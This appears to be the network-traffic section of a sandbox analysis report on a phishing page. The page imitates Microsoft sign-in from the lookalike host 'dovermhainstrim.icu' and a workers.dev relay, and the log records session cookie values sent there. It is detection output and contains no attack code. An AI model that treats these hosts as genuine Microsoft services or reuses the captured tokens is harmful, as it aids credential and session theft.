      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /common/GetCredentialType?mkt=en-US HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficDNS traffic detected: DNS query: e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: dovermhainstrim.icu
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
      Source: global trafficDNS traffic detected: DNS query: portal.microsoftonline.com
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1919245856:1743013575:nXXmh0HbrHlQXpy4m6h5G9OJr9O9QhmryX8dJ0tI8rA/92690b6b4f3ea0f4/SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3W HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3614sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3Wcf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-store, no-cacheContent-Length: 1245Content-Type: text/htmlSet-Cookie: s.SessID=c47263a9-0123-4f08-8140-3ef73120f81d; path=/; secure; HttpOnly; SameSite=NoneSet-Cookie: s.SessID=c47263a9-0123-4f08-8140-3ef73120f81d; path=/; secure; HttpOnly; SameSite=NoneSet-Cookie: x-portal-routekey=eus; path=/; secure; HttpOnlyx-ms-correlation-id: 25ef1542-6906-42bc-bd8f-5f5fbcf962a5X-Content-Type-Options: nosniffX-UA-Compatible: IE=EdgeX-Cache: CONFIG_NOCACHEX-MSEdge-Ref: Ref A: F0E09B4B36784451938D69617802F246 Ref B: BL2AA2030102021 Ref C: 2025-03-26T19:28:01ZDate: Wed, 26 Mar 2025 19:28:00 GMTConnection: close
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
